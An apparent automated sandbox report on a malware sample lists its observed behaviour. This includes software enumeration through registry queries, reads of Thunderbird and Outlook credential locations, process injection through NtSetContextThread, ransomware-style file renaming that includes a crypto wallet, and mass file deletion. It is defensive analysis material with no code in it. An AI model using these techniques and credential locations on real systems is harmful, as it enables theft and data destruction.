RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:27 a.m.	key_handle: 0x000005c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Aug. 9, 2021, 9:26 a.m.	key_handle: 0x00000348 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook

Network activity contains more than one unique useragent (4 events)

process	GFDyrtucbvfdg.exe	useragent	Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
process	DSFnbyhgfrtydfg.exe	useragent
process	j6VXXENS27.exe	useragent	zipo
process	j6VXXENS27.exe	useragent	aswe

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (14 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2260 called NtSetContextThread to modify thread in remote process 1812
Process injection	Process 1836 called NtSetContextThread to modify thread in remote process 1632
Process injection	Process 2084 called NtSetContextThread to modify thread in remote process 2364
Process injection	Process 2412 called NtSetContextThread to modify thread in remote process 3932
Process injection	Process 2300 called NtSetContextThread to modify thread in remote process 4024
Process injection	Process 2488 called NtSetContextThread to modify thread in remote process 3180
Process injection	Process 808 called NtSetContextThread to modify thread in remote process 3332
NtSetContextThread Aug. 9, 2021, 9:26 a.m.	registers.eip: 4804608 registers.esp: 1638384 registers.edi: 0 registers.eax: 4456511 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2000355780 thread_handle: 0x000002a0 process_identifier: 1812	1	0	0
NtSetContextThread Aug. 9, 2021, 9:26 a.m.	registers.eip: 4325376 registers.esp: 1638384 registers.edi: 0 registers.eax: 4302468 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2000355780 thread_handle: 0x00000118 process_identifier: 1632	1	0	0
NtSetContextThread Aug. 9, 2021, 9:26 a.m.	registers.eip: 4407296 registers.esp: 1638384 registers.edi: 0 registers.eax: 4291211 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2000355780 thread_handle: 0x00000118 process_identifier: 2364	1	0	0
NtSetContextThread Aug. 9, 2021, 9:41 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4245278 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003f0 process_identifier: 3932	1	0	0
NtSetContextThread Aug. 9, 2021, 9:41 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4219246 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b0 process_identifier: 4024	1	0	0
NtSetContextThread Aug. 9, 2021, 9:41 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4209646 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002b8 process_identifier: 3180	1	0	0
NtSetContextThread Aug. 9, 2021, 9:41 a.m.	registers.eip: 54983576 registers.esp: 72908800 registers.edi: 0 registers.eax: 4200932 registers.ebp: 69178896 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000518 process_identifier: 3332	1	0	0

Appends a known multi-family ransomware file extension to files that have been encrypted (50 out of 79 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Python27\tcl\tcl8.5\encoding\euc-cn.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-3.enc
file	C:\Python27\tcl\tcl8.5\encoding\ascii.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp857.enc
file	C:\Python27\tcl\tcl8.5\encoding\macIceland.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp864.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1254.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-8.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp860.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp863.enc
file	C:\Python27\tcl\tcl8.5\encoding\ksc5601.enc
file	C:\Python27\tcl\tcl8.5\encoding\euc-kr.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1255.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-2.enc
file	C:\Python27\tcl\tcl8.5\encoding\macGreek.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1256.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp949.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp437.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp775.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-14.enc
file	C:\Python27\tcl\tcl8.5\encoding\big5.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp950.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso2022-jp.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp869.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-5.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-9.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp874.enc
file	C:\Python27\tcl\tcl8.5\encoding\macRoman.enc
file	C:\Python27\tcl\tcl8.5\encoding\gb1988.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-15.enc
file	C:\Python27\tcl\tcl8.5\encoding\macDingbats.enc
file	C:\Python27\tcl\tcl8.5\encoding\macThai.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp865.enc
file	C:\Python27\tcl\tcl8.5\encoding\jis0201.enc
file	C:\Python27\tcl\tcl8.5\encoding\macCentEuro.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp850.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1257.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1251.enc
file	C:\Python27\tcl\tcl8.5\encoding\euc-jp.enc
file	C:\Python27\tcl\tcl8.5\encoding\jis0208.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp866.enc
file	C:\Python27\tcl\tcl8.5\encoding\macCyrillic.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-1.enc
file	C:\Python27\tcl\tcl8.5\encoding\macRomania.enc
file	C:\Python27\tcl\tcl8.5\encoding\ebcdic.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-4.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1250.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp862.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp936.enc

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 129 events)

file	C:\Users\test22\AppData\Local\Temp\zxcv.EXE
file	C:\Users\test22\AppData\Local\Temp\tmp671A.tmp
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3088.23419109
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3088.23419109
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3088.23419109
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-time-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleMarshal.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssckbi.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssdbm3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy_InUse.dll
file	C:\Users\test22\AppData\LocalLow\qT1wG2cI7tX5f
file	C:\Users\test22\AppData\LocalLow\rQF69AzBla
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-string-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\RYwTiizs2t
file	C:\Users\test22\AppData\LocalLow\foxmail.temp
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processenvironment-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\x3CF3EDNhm
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\sY9eU8qD7hB3_m.zip
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldif60.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-multibyte-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-profile-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ucrtbase.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-rtlsupport-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\frAQBc8Wsa
file	C:\Users\test22\AppData\LocalLow\chrome_urls.txt
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-conio-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-filesystem-l1-1-0.dll

